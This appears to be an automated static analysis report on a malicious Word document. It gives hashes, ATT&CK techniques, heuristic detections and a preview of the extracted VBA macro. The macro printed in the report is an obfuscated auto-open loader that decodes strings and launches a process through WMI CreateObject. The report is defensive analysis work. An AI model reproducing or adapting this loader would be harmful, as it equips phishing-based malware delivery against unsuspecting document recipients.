Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e9a9ffccf652fe85…

MALICIOUS

Office (OLE)

134.0 KB Created: 2019-09-24 06:41:00 Authoring application: Microsoft Office Word First seen: 2019-11-20
MD5: 127aafd4320e47044f5b4b9278b49612 SHA-1: 6f5df3d06bbdc87798f158d3b27ecd75a36c9a05 SHA-256: e9a9ffccf652fe8597fb9bcfae22c384112414d6491c1d09de967c784dd07a11
282 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a heavily obfuscated VBA macro loader, indicated by multiple critical and high severity heuristics including 'OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC'. The macro uses 'CreateObject' and an 'autoopen' function, suggesting it attempts to execute a secondary payload. The presence of these indicators strongly suggests a malicious document designed to deliver malware via spearphishing.

Heuristics 8

  • ClamAV: Doc.Malware.Generic-7178224-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-7178224-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9912 bytes
SHA-256: 02cbe72498c8f5b51254dddb6c2864b280c506f24b8ac6a3cca4dd29c9dae4bb
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Kkmjww"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "V5d5wwdq, 0, 0, MSForms, TextBox"
Attribute VB_Control = "Kuj257, 1, 1, MSForms, TextBox"
Attribute VB_Control = "R8sizknj, 2, 2, MSForms, TextBox"
Attribute VB_Control = "P5zziw, 3, 3, MSForms, TextBox"
Attribute VB_Control = "K0zw6p, 4, 4, MSForms, TextBox"
Attribute VB_Control = "Rvaatk6s, 5, 5, MSForms, TextBox"
Attribute VB_Control = "Yfm2nuz, 6, 6, MSForms, TextBox"
Attribute VB_Control = "Wi0uda9, 7, 7, MSForms, TextBox"
Attribute VB_Control = "Vjolh56c, 8, 8, MSForms, TextBox"
Attribute VB_Control = "C6h13sc, 9, 9, MSForms, TextBox"
Attribute VB_Control = "X4i4im, 10, 10, MSForms, TextBox"
Attribute VB_Control = "Rjms62, 11, 11, MSForms, TextBox"
Attribute VB_Control = "Mn1kbo6t, 12, 12, MSForms, TextBox"
Attribute VB_Control = "Lpanu774, 13, 13, MSForms, TextBox"
Attribute VB_Control = "Fhwcnk, 14, 14, MSForms, TextBox"
Attribute VB_Control = "Qidfou, 15, 15, MSForms, TextBox"
Attribute VB_Control = "Awwcn3i, 16, 16, MSForms, TextBox"
Attribute VB_Control = "Nuus40t, 17, 17, MSForms, TextBox"

Attribute VB_Name = "Shqkwv"
Private Const Brjjiv As String = "Xnp6q4q"
Private Const Tpvkdl As String = "Itj64o"
Private Wvhidrap      As String
Private J5hw3qk      As Boolean
Private Pjiv7b      As Integer
Private Declare Sub Ffqczj Lib "V0rdjf" ()
Private Declare Sub H61ubr Lib "P44ci1" ()
Function Nnazwms()
Dim pDBXVeleSn95, yALtDyQJVU12 As Integer
yALtDyQJVU12 = 8541
For pDBXVeleSn95 = 0 To 88
yALtDyQJVU12 = yALtDyQJVU12 + pDBXVeleSn95
DoEvents
Next pDBXVeleSn95
Ma37awj5 = Ti1iz0cl(Kkmjww.Mn1kbo6t + Kkmjww.Yfm2nuz)
Dim kmJQTFcJOI63, mxBXzQQtbS22 As Integer
mxBXzQQtbS22 = 8263
For kmJQTFcJOI63 = 0 To 96
mxBXzQQtbS22 = mxBXzQQtbS22 + kmJQTFcJOI63
DoEvents
Next kmJQTFcJOI63
Z7bap4 = CreateObject(Ti1iz0cl("_:_a_:_aw_:_ainmgm_:_ats:W_:_ain3_:_a2_P_:_aroces_:_as_:_a")).Create(Ma37awj5, Cj8ajz, Yh3wpj, R5tjsf)
Dim UKUBCTGYrd34, wUXYnJzxWl84 As Integer
wUXYnJzxWl84 = 7624
For UKUBCTGYrd34 = 0 To 76
wUXYnJzxWl84 = wUXYnJzxWl84 + UKUBCTGYrd34
DoEvents
Next UKUBCTGYrd34
End Function
Function Ti1iz0cl(E6pinh)
Dim bIEeUYPMQL63, cfibQITmka13 As Integer
cfibQITmka13 = 5323
For bIEeUYPMQL63 = 0 To 25
cfibQITmka13 = cfibQITmka13 + bIEeUYPMQL63
DoEvents
Next bIEeUYPMQL63
Ti1iz0cl = Replace(E6pinh, Replace("uegw72bdja_uegw72bdja:uegw72bdja_uegw72bdjauegw72bdjaauegw72bdja", "uegw72bdja", ""), "")
End Function


Attribute VB_Name = "S8u1adw"
Private Const S3vczf As String = "Z918ur1p"
Private Const Qz0su2 As String = "Y60rrn"
Private Pzkb0pl      As String
Private C2ijjt      As Boolean
Private Ypdfc9tz      As Integer
Private Declare Sub Gpzhdb Lib "J61dhb" ()
Private Declare Sub R1uiqcwt Lib "Y72pqba" ()
Sub autoopen()
Dim SQZiGxarup86, NxIwNiZDoj34 As Integer
NxIwNiZDoj34 = 6788
For SQZiGxarup86 = 0 To 17
NxIwNiZDoj34 = NxIwNiZDoj34 + SQZiGxarup86
DoEvents
Next SQZiGxarup86
Nnazwms
End Sub
Function Yh3wpj()
Dim TYWXvZKgog25, OnSlpvPgmm82 As Integer
OnSlpvPgmm82 = 4395
For TYWXvZKgog25 = 0 To 36
OnSlpvPgmm82 = OnSlpvPgmm82 + TYWXvZKgog25
DoEvents
Next TYWXvZKgog25
Z7bap4$ = N7oo7a3p + Y83nojt
Dim YIqBrnoQql13, TyvIxAOXdA51 As Integer
TyvIxAOXdA51 = 9313
For YIqBrnoQql13 = 0 To 65
TyvIxAOXdA51 = TyvIxAOXdA51 + YIqBrnoQql13
DoEvents
Next YIqBrnoQql13
Set Yh3wpj = CreateObject(Ti1iz0cl(Kkmjww.P5zziw))
Yh3wpj.ShowWindow! = Z7bap4
Dim UKUBCTGYrd34, wUXYnJzxWl84 As Integer
wUXYnJzxWl84 = 7624
For UKUBCTGYrd34 = 0 To 76
wUXYnJzxWl84 = wUXYnJzxWl84 + UKUBCTGYrd34
DoEvents
Next UKUBCTGYrd34
End Function


' Processing file: /opt/analyzer/scan_staging/d39d9c043d7944d3b17af66578e403dd.bin
' ===============================================================================
' Module streams:
' Macros/VBA/Kkmjww - 3295 bytes
' Macros/VBA/Shqkwv - 3266 bytes

... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.